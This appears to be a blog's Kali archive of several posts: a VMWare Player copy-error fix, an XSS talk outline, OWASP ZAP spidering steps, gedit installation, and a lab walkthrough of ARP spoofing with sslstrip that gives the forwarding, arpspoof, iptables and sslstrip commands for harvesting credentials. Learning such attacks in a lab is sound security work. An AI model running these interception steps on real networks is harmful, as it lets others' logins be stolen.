Computers, Programming, Technology, Music, Literature

Archive for the ‘kali’ Category

Fixing VMWare Player Cannot write to local file Cancelling the file copy operation

leave a comment »

 

 

PROBLEM: When copying files from VMWare player to the host (Windows host in this case), you get “Cannot write to local file”.

SOLUTION: Make space. Clear temp and %temp% directories, on your operating system drive.

 

I was trying to copy 5 GB of files from my VMWare player guest OS Kali Linux to my Windows Host. VMWare player displays Copying file “part2.rar” from virtual machine and exits with “Cannot write to local file. Cancelling the file copy operation.”.

 

image

image

This knowledge base from vmware hints disabling tempfs in linux operating systems.  https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056353 

I looked at the temp and %temp%  windows directories and dicovered the below temp location  where VMWarePlayer copies the files from the VM Guest, and from there it copies to the destination directory in the host OS.

image

My Operating System drive C: was full, and I had to clear the temp directories and free up some space to do 5 GB copy operation from WMWare Player Guest Kali Linux to Windows Host.

Advertisements

Written by gmaran23

March 3, 2017 at 6:30 pm

Devouring Security: Cross Site Scripting [XSS]

leave a comment »

 

 

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

 

 

 

 

Agenda in <ul><li>

 

·         Risk, Stories & the news

·         XSS Anatomy

·         Untrusted Data Sources – Well, Where did that come from?

·         Shouldn’t it be called CSS instead?

·         Types of XSS

          Type 0 [DOM based]

          Type 1 [Reflected or Non-persistent XSS]

          Type 2 [Persistent or Stored XSS]

·         Live Demo: XSS 101 with alert(‘hello XSS world’)

·         Live Demo: Cookie Hijacking and Privilege Escalation

          Face/Off with John Travolta and Nicolas Cage

·         Live Demo: Let’s deploy some Key loggers,huh?

·         Mitigations

          Input Sanitization

          Popular Libraries for .Net, Java, php

§  Demo: Input sanitization

          Whitelists (vs. Blackists)

          Output Encoding

§  Contextual

§  Demo: Output Encoding

          Browser Protections & bypasses

          Framework Protections & bypasses

          Content Security Policy (CSP) in brief

·         Secure Code reviews: Spot an XSS, How?

·         Tools: Do we have an option?

·         XSS Buzz and how to Fuzz

·         Renowned Cheat sheets

·         Further reading & References

 

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

leave a comment »

 

 

 

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23


 

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennets for feedback and sugesstions.

 

 

 

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »

 

 

 

You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim – Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

 

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Installing gedit on kali linux

with 6 comments

 

yeah, it’s really a bummer when you try to edit a file with your (our) favorite text editor gedit, and you get “command not found”. You may be better off using gvim or leafpad but when it comes to breaking the habit of using gedit, you would have a second thought of installing gedit by hook or crook. Just as in backtrack, Off you go, and try

apt-get install gedit

 

you get Unable to locate package gedit

Screenshot_010214_031027_PM

You may be wondering if your sources.list should be updated. That is the answer. Update the /etc/apt/sources.list first based on your need with the list of repositories from here. [Or directly try apt-get update from the terminal and then install gedit with apt-get install gedit]

Or for a minimum configuration of repository list, in the terminal run

leafpad /etc/apt/sources.list

replace (or make sure) the contents of sources.list is as below

deb http://http.kali.org/kali kali main contrib non-free 
deb http://security.kali.org/kali-security kali/updates main contrib non-free 
deb cdrom:[Debian GNU/Linux 7.0 Kali - Official Snapshot i386 LIVE/INSTALL Binary 20130905327-07:57]/ kali contrib main non-free 



Save the changes to the sources.list and run apt-get update to update the package repositories.

apt-get update 

 

That’s it, once the apt-get repository is updates, you can run

apt-get install gedit

and then

gedit /etc/hosts

or

leafpad /etc/hosts Winking smile

Written by gmaran23

January 2, 2014 at 3:52 pm

Posted in kali

Tagged with , , ,